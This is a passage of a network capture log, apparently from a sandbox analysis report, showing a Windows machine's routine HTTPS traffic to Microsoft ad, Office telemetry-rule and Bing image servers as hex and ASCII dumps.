2024-11-21 08:53:49 UTC	16384	IN	Data Raw: 92 36 1d 55 be 66 ae 1f c4 fa 4c 16 d2 2a 59 5e 34 d7 31 c9 f2 b7 f1 28 35 a9 6a ad a8 c6 db 12 4f 36 06 f9 b7 37 de a2 c5 e3 8b 54 db 3d b2 b4 9b bf bb 5d 74 d7 b3 93 d7 e4 3b 68 cc eb 18 af 21 55 7b f8 19 a4 93 85 dd d5 6b a2 b0 f0 dc 9a 9b 49 1d c4 ab 18 b5 c1 f9 7f 88 9e d5 3f 8b 63 b7 d5 fe c2 f6 cb 24 46 d7 96 f9 7e 56 c7 ad 33 e1 fc bf 6b ba ba d4 c4 ec d1 44 de 5f 95 fc 3c 77 35 94 ea 37 4f 9d 68 c3 64 66 cd a6 de ad f5 d4 0f e5 c7 15 b7 de dc df 95 6a 7c 2e d3 a7 6f 1e 5b 7c be 6b 47 20 db 26 ee 31 4f f1 05 c4 43 58 69 e5 5f 2c cb 17 ef 77 7f 16 2b 4b e1 16 9b 2f fc 2c 08 2f 7c d6 fb 3c 8a 5d 55 7e ea fa 56 35 2a 3f 65 26 fb 0f a1 ed d7 2f 0d a5 bb 49 71 2a ab 6d fb b5 cc 49 a8 a3 cc df 67 fe 16 cf fb d5 95 e3 cb 7d 46 eb 52 96 48 e7 6f 2e 3f f5 Data Ascii: 6UfLY^41(5jO67T=]t;h!U{kI?c$F~V3kD_<w57Ohdfj\|.o[\|kG &1OCXi_,w+K/,/\|<]U~V5?e&/Iq*mIg}FRHo.?
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: 53 2e 33 e7 53 ea 1d 06 ac 87 a7 6a 1c e6 35 a6 e3 2d c5 4c ea 36 d0 04 4b 9d b5 3d 9e 3c ce 7e 5a 8d d4 ed c2 52 da f1 26 4f 4a 1e c3 5a 34 6e 59 8c 4c af f7 85 26 f0 35 09 1f 6b 28 ff 00 66 a3 b0 62 d2 42 47 cc aa d4 b7 3b ce a4 df dd eb 5c ef 76 74 c5 ea 8f 4b f8 4b 7c 20 bc 8b ef 45 e6 49 f2 b6 ed b5 f5 ff 00 80 6d 1d fc 3f 67 61 a7 7f af 9d 7c c9 67 93 ef 7e 1e b5 f1 67 c2 fb 84 6d 62 da de 55 69 23 66 fb b5 f7 37 c2 2b 89 5b 4b b3 bc b9 83 c9 b7 8a 20 91 33 7f 5a fc fb 89 a1 cb 55 79 9f 59 97 c9 ba 08 c0 f8 9d 6b ac 45 71 a7 bd dc ab 25 ac 77 2a 1a 5f ba df 4a 35 c8 a3 dd 75 68 37 7f aa 07 fd e3 5a 3f 12 a6 bb bf b5 68 dd 55 a3 8a ed 64 5f ee b0 06 a8 ea 50 b8 d7 a4 83 ca 66 17 56 d9 5f f6 78 e9 5f 3b 07 6a 6b ca e7 a0 dd ec 37 41 f0 b6 95 6d af 69 Data Ascii: S.3Sj5-L6K=<~ZR&OJZ4nYL&5k(fbBG;\vtKK\| EIm?ga\|g~gmbUi#f7+[K 3ZUyYkEq%w*_J5uh7Z?hUd_PfV_x_;jk7Ami

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49757	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:48 UTC	265	OUT	POST /v3/Delivery/Events/Impression HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Content-Length: 1505 Content-Type: text/plain; charset=UTF-8 Host: arc.msn.com Connection: Keep-Alive Cache-Control: no-cache
2024-11-21 08:53:48 UTC	1505	OUT	Data Raw: 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 54 49 44 3d 31 26 43 49 44 3d 31 32 38 30 30 30 30 30 30 30 30 31 36 31 35 36 30 39 26 42 49 44 3d 35 33 32 38 33 34 31 34 31 26 50 47 3d 50 43 30 30 30 50 30 46 52 35 2e 30 30 30 30 30 30 30 49 52 55 26 54 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 52 45 51 41 53 49 44 3d 33 32 33 31 43 30 34 43 42 32 45 35 34 32 41 44 38 46 46 30 42 39 38 31 33 38 34 39 31 30 35 39 26 41 53 49 44 3d 62 37 61 37 37 39 30 65 65 66 65 32 34 63 66 36 39 33 65 39 32 38 61 32 32 64 33 32 38 64 63 31 26 54 49 4d 45 3d 32 30 32 34 31 31 32 31 54 30 38 35 33 34 31 5a 26 53 4c 4f 54 3d 31 26 52 45 51 54 3d 32 30 32 34 31 31 32 31 54 30 38 35 33 33 32 26 4d 41 5f 53 63 6f 72 65 3d 30 26 26 44 53 5f 45 56 54 49 44 3d 33 32 33 31 43 30 34 43 Data Ascii: PID=426081542&TID=1&CID=128000000001615609&BID=532834141&PG=PC000P0FR5.0000000IRU&TPID=426081542&REQASID=3231C04CB2E542AD8FF0B98138491059&ASID=b7a7790eefe24cf693e928a22d328dc1&TIME=20241121T085341Z&SLOT=1&REQT=20241121T085332&MA_Score=0&&DS_EVTID=3231C04C
2024-11-21 08:53:48 UTC	394	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/xml; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Thu, 21 Nov 2024 08:53:47 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:50 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:50 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:50 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085350Z-r1d97b9957747b9jhC1TEBgyec0000000a900000000050be x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:50 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:50 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:50 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:50 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 9bf3f441-f01e-003f-246b-3bd19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085350Z-178bfbc474b7cbwqhC1NYC8z4n000000015g000000005vwf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:50 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49768	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:50 UTC	346	OUT	GET /th?id=OADD2.10239398628216_1JDX0X63GXK5FYFGK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-21 08:53:50 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 601274 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 5B4B7C92AB3247239CAF2D9114CC960B Ref B: EWR30EDGE0417 Ref C: 2024-11-21T08:53:50Z Date: Thu, 21 Nov 2024 08:53:49 GMT Connection: close
2024-11-21 08:53:50 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 18 20 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 35 20 31 33 3a 32 39 3a 33 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF`` ExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:05 13:29:388
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: 8e 2a bb 1d ad 4a 96 f8 a8 e6 19 52 38 6a 64 82 ad a4 02 a6 48 80 ac dc 99 56 45 35 82 9e 90 d5 c5 41 4b b6 a6 ec a4 8a ab 08 a7 ac 55 63 6d 39 54 52 bb 19 5d 62 a7 2c 59 ab 2a a0 d3 95 05 2b 87 2a 2b ac 42 9c b0 8a 9d 57 14 b8 a5 76 52 48 8b c9 14 2c 42 a6 a5 e2 95 d8 ec 88 96 21 4e 58 ea 45 c5 3b 9a 9b b1 d9 11 aa 53 b6 d2 a9 a3 38 aa 00 db 4a ab 4d 67 14 df 37 de 97 2b 15 d1 2e 05 35 86 2a 36 9a 93 cc cd 3e 56 43 92 63 9a 8e 69 bb a8 eb 57 61 5c 77 34 67 34 73 48 b4 c4 2e 7d e8 cf bd 14 98 a0 4c 5c fb d1 9f 7a 4c 51 8a 62 1d 9a 46 34 73 4d a6 48 ac 69 ac 68 6a 6b 0a 00 46 34 8c 73 4b cd 36 a8 03 9a 6d 2e 29 79 a2 e8 06 35 35 85 3e 9b 40 86 d2 62 97 3e f4 99 a0 62 52 62 9f cd 1c d0 04 7b 69 31 4f a3 9a 07 61 b4 52 e2 91 b3 4a e0 14 d6 5a 5c d1 9a 43 23 Data Ascii: JR8jdHVE5AKUcm9TR]b,Y++BWvRH,B!NXE;S8JMg7+.56>VCciWa\w4g4sH.}L\zLQbF4sMHihjkF4sK6m.)y55>@b>bRb{i1OaRJZ\C#
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: bd 55 cd 0a 68 e5 42 e7 65 b5 9a a7 4b ac 2d 67 e0 d2 fc d4 9c 51 71 a9 25 b1 6e 4b 82 5b 75 35 27 7f ef 55 56 62 3a d2 79 80 52 e5 0f 68 cb 73 4b 95 a6 23 d5 67 97 34 df 31 a9 a8 8b 9c d5 86 e7 1d 5a 8a ca f3 5a 8a 9f 66 68 ab c9 22 aa 21 a7 ac 75 3a c7 52 2a 56 bc cc 9e 54 40 b1 53 fc a5 a9 55 69 ca 29 5d 8e c8 89 61 14 be 50 a9 be 5a 32 b4 b5 1d 91 1a c4 b4 ef 2d 29 77 0a 46 70 28 1d 90 be 52 7f 76 8f 29 69 8d 20 a4 f3 56 81 68 4b e5 8a 5d 82 a1 f3 c5 27 9d ed 40 13 ed 4a 55 54 aa ad 70 29 3e d0 28 b3 15 d1 6f 0b 4b 91 54 9a e2 9a d3 ff 00 b5 4f 95 8b 99 17 f7 20 a3 7a d6 6b 4e 69 be 7b 53 e5 62 f6 88 d5 f3 12 93 cd 5a ca f3 cd 1e 73 d3 e4 62 f6 88 d4 f3 92 98 f3 25 66 f9 ad 49 e6 9a 7e cc 5e d0 be d3 0a 63 5c 62 a9 ef a6 b3 53 f6 62 f6 85 df b4 52 35 Data Ascii: UhBeK-gQq%nK[u5'UVb:yRhsK#g41ZZfh"!u:R*VT@SUi)]aPZ2-)wFp(Rv)i VhK]'@JUTp)>(oKTO zkNi{SbZsb%fI~^c\bSbR5
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: ca 77 34 bb 69 76 53 b8 58 6d 2e 29 76 d3 d1 33 45 c2 cc e0 3e 38 78 3b 47 d6 7c 27 25 cb d8 c1 1d f7 db a1 3f 6b 55 f9 f0 ee 15 b7 7f 78 60 2f 1f ec 8a f9 4f c4 67 51 b7 f0 7e b9 2d 9d 8e 96 96 9a 1f 89 6d ec 9a e5 94 fd a9 bc d2 ed b5 7b 08 cf 91 92 3d eb eb df 1b 6b 0b a8 e9 ba e6 97 02 2c 50 e9 93 d9 24 d3 c9 94 6f 31 ae 8a 38 1b b0 36 80 9c 36 7a 9a f9 82 ea 1d 37 56 d2 7c 59 e1 9b 7b eb 49 2f b5 2f 18 68 e6 08 3c ed de 70 1f 6b 57 71 b7 96 55 dc b9 c7 4c 8f 5a f0 ea 7b 3f af cb 99 7b aa 29 fc ee cf 66 9c aa 2c 0c 54 1f bc e4 d7 e0 7a 3f c3 7f 09 df 9d 0f c7 5e 13 d2 b4 1b 4b 9b 5d 4b 50 33 7f 6b dc dd ed 78 65 81 11 d6 23 08 e0 82 d7 0b 87 1f 77 73 92 0e 16 b8 7f 81 fa 05 f4 de 10 f1 1c 17 36 3a 7c fa b5 8e aa 74 1b 68 ef 14 3d ba cb 21 30 17 72 01 Data Ascii: w4ivSXm.)v3E>8x;G\|'%?kUx`/OgQ~-m{=k,P$o1866z7V\|Y{I//h<pkWqULZ{?{)f,Tz?^K]KP3kxe#ws6:\|th=!0r
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: 01 5e 39 c7 af 5a ce 4a 1c da 9a c7 9d 47 4d 11 87 74 2f e3 68 ae f7 7c b2 31 99 57 f8 b0 cf 8e 7d b8 ff 00 39 ae 9b e1 df 87 ef 2e 2f 9a 40 df be 69 55 24 56 e8 a5 c4 99 fc ba 9f c6 b2 2e 2f 2c e4 f1 72 e5 da 3b 4b 69 14 6e 5f e2 44 04 f1 f5 61 c7 e1 5e 85 e0 6b a9 6d 95 67 f2 e3 59 2e 5a 69 15 be f3 7c c9 1e d2 7e 80 f0 3f c6 b9 b1 95 1c 28 d9 2b 36 6f 83 a6 a7 59 36 f6 27 ff 00 84 6a 3b af 12 4b 6d 6f b9 a1 b6 56 76 6f ef 46 89 18 2c 4f 41 96 e3 db e6 ae 3b c7 5a 8d 9d 82 c9 70 3e 69 57 76 df e1 dc 1e 59 08 fa 60 7f 3f 6a ee 21 3a 9f db 2e b4 e1 2b 44 b3 a1 85 a7 65 0e bb 16 4f 31 d4 e7 d7 68 c9 ff 00 1a f1 df 10 79 ba 96 b1 3b 8f 9a de 39 1b 67 f1 70 09 c7 5e b9 c9 35 c9 81 a7 cf 3f 79 e8 8e bc 75 4f 67 4d f2 ad 59 d8 fc 3d 82 28 7e 1f dd 6a 7e 53 34 Data Ascii: ^9ZJGMt/h\|1W}9./@iU$V./,r;Kin_Da^kmgY.Zi\|~?(+6oY6'j;KmoVvoF,OA;Zp>iWvY`?j!:.+DeO1hy;9gp^5?yuOgMY=(~j~S4
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: f0 c4 3e a3 e2 2d 36 24 5d c6 eb cd 8f 6a b7 f1 f9 4e 3f 0e 79 aa 96 73 cf a5 dc 5c a5 c3 6d 13 e0 4b b9 7f 83 3f eb 07 b1 23 06 ab fc 21 ba 82 3f 8a 16 36 32 2c 92 5b c9 77 f2 c6 bf 2b 48 18 15 20 7b 90 6b d0 94 9b a5 3f 46 79 8a ca a5 3e f7 5f 99 f7 f7 c0 df 1a 5b f8 9b e1 3e 86 75 26 ff 00 89 b5 9b c3 6d 7b 0c 4c 1c ac b1 10 af c8 38 e9 b5 ba fd d7 15 e6 3a c7 88 ec 20 ff 00 82 85 69 84 c1 23 4b 75 63 26 8c b0 ee 88 37 99 e5 87 de cd b7 85 da 7f bd bf b6 71 f2 d6 0f ec 93 aa 6b 3e 15 d6 27 d2 ef 3c 2b aa 78 7b 45 d4 5a 2b 95 bb d4 a4 f3 04 77 11 7d d2 43 20 20 3a 6e 43 85 fe ed 3b c6 d7 1a 75 b7 ed 51 17 8c b5 3b 6b 48 34 eb 6d 6e 33 14 d2 fe e6 7d 8f 1c 6a f3 39 38 2a 8a 37 00 a1 77 39 c7 61 93 f3 d5 31 14 a9 cf e2 5b db a7 f9 b3 d9 a7 84 a9 36 ed 17 Data Ascii: >-6$]jN?ys\mK?#!?62,[w+H {k?Fy>_[>u&m{L8: i#Kuc&7qk>'<+x{EZ+w}C :nC;uQ;kH4mn3}j98*7w9a1[6
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: 00 0f ad 79 15 b3 5c 15 0a ee a4 a7 78 5b 5b 6a ef d8 f4 a3 81 c5 d5 c3 5a 31 b3 5d f4 d0 f2 1d 3f 5e bf b0 b1 6b 38 a0 8e 09 25 88 c3 f2 ae e6 f9 f6 16 f9 8f 43 c5 74 7e 09 f1 1d dd d7 c2 fd 5f c2 f6 fa 55 f6 a1 1c b7 70 aa b5 a4 0d 23 46 55 c6 5b 0b 9f 97 fa d7 55 e2 2b 4f 83 9a 45 e4 f6 d1 b5 b3 b5 8c 52 dc 5f 4e 14 dc 4a c4 64 22 a7 9c c5 5d 98 8e 81 78 fc 6b 37 e1 55 f6 8f ac 78 f2 de db 47 d2 ee 4c 32 41 20 9d 9a 43 0e dd 90 97 69 02 47 b4 75 5c 01 9e 8d 5c 38 8c 74 2b d1 72 8d 16 94 5a 95 de 9b 6a bf ab 9d d8 6c 2d 4a 55 14 6a 55 5a ab 5b 73 03 fe 11 3d 76 1b 38 d3 50 d2 a4 b5 f3 57 e4 5b b6 48 78 20 2e 58 37 2b cf a8 ad 7b 3f 82 9a b5 fe ef 10 6a 7a d4 10 41 62 8d 34 56 91 da 48 ee b1 e7 25 97 cc f2 f7 63 a6 47 19 ae ab c7 5f 11 2d ed bc 49 3d 96 Data Ascii: y\x[[jZ1]?^k8%Ct~_Up#FU[U+OER_NJd"]xk7UxGL2A CiGu\\8t+rZjl-JUjUZ[s=v8PW[Hx .X7+{?jzAb4VH%cG_-I=
2024-11-21 08:53:51 UTC	16065	IN	Data Raw: d7 09 f8 54 d4 c4 62 29 62 52 52 8b 8d ed ee c6 2a da da fa a9 76 d3 56 61 4f 0d 4e 74 9e ae f6 be af fe 1b e6 79 0c 3e 13 f8 4b 7d e2 87 d3 e5 f1 f7 8d f5 5d 42 e2 42 92 f9 76 82 18 55 3e f4 bb d9 f7 61 55 41 66 3e 95 a9 a5 8f 84 5a 9e a9 15 a6 83 e0 cd 77 c4 33 47 66 0c 4f 77 7f 1d 9a 48 83 7f 96 a1 10 a9 6d d8 3d 06 6b 69 be 0b 6a 5f f0 a3 bc 4d e3 d5 f1 25 95 bd 8a c5 ff 00 13 0b 98 a2 92 59 23 b3 fd db f9 51 23 04 39 90 3a 16 27 04 aa a8 fe 23 5e 7b e3 4f 09 78 1e d7 41 d2 bc 41 fd bd ac 6a 68 b6 31 c7 14 16 76 d1 43 3a 46 77 61 f9 76 c6 58 91 df 15 ed 72 b9 28 b9 d5 9a be 91 d1 da ff 00 f6 ea 8e 9d b5 e9 7e a7 15 38 a5 ce a9 c6 2d 2d 5e bf e7 7f cb a9 f5 27 c2 3d 57 4c ba f8 75 a0 6b 1a 1e 89 fd 94 8b 68 3e cd 10 b9 24 da ec 25 36 87 ea 7e e9 aa 97 Data Ascii: Tb)bRR*vVaONty>K}]BBvU>aUAf>Zw3GfOwHm=kij_M%Y#Q#9:'#^{OxAAjh1vC:FwavXr(~8--^'=WLukh>$%6~
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: 32 4f 19 07 27 e3 b7 c6 7f 85 fe 35 f0 2b 78 7f 45 d7 a4 ba ba ba be b6 75 47 b2 96 14 da 8f b9 89 67 00 0e 07 e7 5f 33 69 5e 3b bb d3 b4 bb 7d 3a c3 cf 8e de d6 32 20 59 24 dd e5 96 18 76 4e 3e 56 6a c1 49 ad 8a b6 2c 63 62 cd 9d d2 31 f9 7f 0c 8a f4 15 3a f5 39 e3 51 24 ba 6b d3 cc f0 63 46 95 2e 49 53 6d b5 bd fd 6e 7d 57 ff 00 04 d9 5b 5f 27 c5 52 c7 04 7b 99 a3 b9 6d ab f3 ec de f8 18 c7 4f 97 d6 bc 8f c4 f3 4b a9 58 dc de 1f 96 49 e4 69 e4 eb ba 67 79 37 75 c7 1d 73 5c af 82 fc 7d e2 7f 0b 47 78 9e 19 d5 24 d1 d6 fd 04 73 fd 8d b6 33 2a 92 42 ee e4 81 93 d8 d6 2d c5 f5 dc d3 79 92 cf 26 57 ee d7 75 07 ec 93 be ac e7 ad 85 95 59 de f6 47 7b a6 ff 00 64 4d e1 f6 8f 51 6d d3 4b c2 ee 6f bd ed c7 38 cf b5 15 c0 47 21 eb bb 9f f7 a8 ad d6 29 af b2 4f f6 Data Ascii: 2O'5+xEuGg_3i^;}:2 Y$vN>VjI,cb1:9Q$kcF.ISmn}W[_'R{mOKXIigy7us\}Gx$s3*B-y&WuYG{dMQmKo8G!)O
2024-11-21 08:53:51 UTC	16384	IN	Data Raw: 46 35 23 05 cb 73 49 08 dd bd 17 ee ff 00 9f 5a 8d a5 26 3e 1b e6 dd f7 7f c9 aa 5f da 11 b7 fa c5 ff 00 be 5a 9a f7 f1 b4 99 45 5c d4 fb 39 15 ed a1 6d cd 18 e5 95 64 57 de d9 fc 69 f2 39 1c ba b5 66 ae a1 10 6f e2 cf e1 42 df a3 ff 00 ac 6d a2 a1 d3 92 d6 c5 c6 b4 3b 97 fc cf 2d bf ba 56 b2 fc 7b 66 fa 96 8a c6 35 fd f4 5f bc 8d 97 d4 54 ed 79 00 ff 00 80 d3 ed ef 62 91 58 6e 65 2b 4b 96 70 92 9a 5b 05 4f 67 56 9c a9 c9 e8 ce 6e 3d 75 21 d8 83 ef 6d 1b a4 f3 0e ec e3 ad 75 56 b2 bc d0 ae 7e 63 b6 ab 35 ae 89 e4 ec 7b 68 17 e5 ff 00 9e 7f 33 7e 35 62 33 6d 0a c6 20 6d b1 aa e1 57 9f 94 54 d5 71 92 f7 53 bf 98 f0 b0 a9 06 f9 e4 9a f2 2f 5b af ca c0 bf de fe 74 9b 4b 36 11 99 aa 06 9e 22 bc cb cf f0 ff 00 0d 3a 1b 8b 7d dc 48 b9 ea df 35 72 b8 cb 5d 0f 45 Data Ascii: F5#sIZ&>_ZE\9mdWi9foBm;-V{f5_TybXne+Kp[OgVn=u!muV~c5{h3~5b3m mWTqS/[tK6":}H5r]E

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:50 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:50 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:50 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 3c827ba2-d01e-0014-367c-3bed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085350Z-178bfbc474bxkclvhC1NYC69g4000000014g000000009212 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:50 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.6	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:50 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
